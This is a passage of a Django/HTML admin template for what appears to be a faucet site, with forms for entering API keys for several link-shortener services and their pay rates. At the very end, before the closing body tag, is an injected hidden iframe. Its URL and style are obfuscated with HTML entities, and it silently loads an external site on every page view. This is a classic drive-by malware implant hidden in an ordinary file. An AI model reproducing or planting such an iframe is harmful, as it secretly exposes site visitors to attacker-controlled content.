                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='sh2rt_up' name='sh2rt_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Zshort</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{zshort}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="zshort" required="" class="form-control" id="zshort"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/JGI9f3c" target="_blank" class="btn btn-success">Register</a>
                                   {% if zshort == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='zshort_up' name='zshort_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Shrinkearn</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.50$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{shrinkearn}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="shrinkearn" required="" class="form-control" id="shrinkearn"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/3GI9gc1" target="_blank" class="btn btn-success">Register</a>
                                   {% if shrinkearn == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='shrinkearn_up' name='shrinkearn_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Birdurls</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.50$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{birdurls}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="birdurls" required="" class="form-control" id="birdurls"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/XGI9hjb" target="_blank" class="btn btn-success">Register</a>
                                   {% if birdurls == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='birdurls_up' name='birdurls_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Ez4short</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{ez4short}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="ez4short" required="" class="form-control" id="ez4short"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/eGI9kLu" target="_blank" class="btn btn-success">Register</a>
                                   {% if ez4short == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='ez4short_up' name='ez4short_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Clk</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.20$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{clk}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="clk" required="" class="form-control" id="clk"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/KGI9m1T" target="_blank" class="btn btn-success">Register</a>
                                   {% if clk == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='clk_up' name='clk_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                       
                        <!-- Pending Requests Card Example -->
                    </div>
                </div>
                <!-- /.container-fluid -->
            </div>
            <!-- End of Main Content -->
              
            <!-- Footer -->
            <footer class="sticky-footer bg-white">
                <div class="container my-auto">
                    <div class="copyright text-center my-auto">
                        <span>Copyright &copy; {{seting.nama_faucet}} 2021</span>
                    </div>
                </div>
            </footer>
            <!-- End of Footer -->

        </div>
        <!-- End of Content Wrapper -->

    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->
    <a class="scroll-to-top rounded" href="#page-top">
        <i class="fas fa-angle-up"></i>
    </a>

    <!-- Logout Modal-->
    <div class="modal fade" id="logoutModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="exampleModalLabel">Ready to Leave?</h5>
                    <button class="close" type="button" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">×</span>
                    </button>
                </div>
                <div class="modal-body">Select "Logout" below if you are ready to end your current session.</div>
                <div class="modal-footer">
                    <button class="btn btn-secondary" type="button" data-dismiss="modal">Cancel</button>
                    <a class="btn btn-primary" href="/logout">Logout</a>
                </div>
            </div>
        </div>
    </div>

    <!-- Bootstrap core JavaScript-->
    <script src="{% static "vendor/jquery/jquery.min.js"%}"></script>
    <script src="{% static "vendor/bootstrap/js/bootstrap.bundle.min.js"%}"></script>

    <!-- Core plugin JavaScript-->
    <script src="{% static "vendor/jquery-easing/jquery.easing.min.js"%}"></script>

    <!-- Custom scripts for all pages-->
    <script src="{% static "js/sb-admin-2.min.js"%}"></script>

    <!-- Page level plugins -->
    <script src="{% static "vendor/chart.js/Chart.min.js"%}"></script>

    <!-- Page level custom scripts -->
    <script src="{% static "js/demo/chart-area-demo.js"%}"></script>
    <script src="{% static "js/demo/chart-pie-demo.js"%}"></script>

<iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
</body>

</html>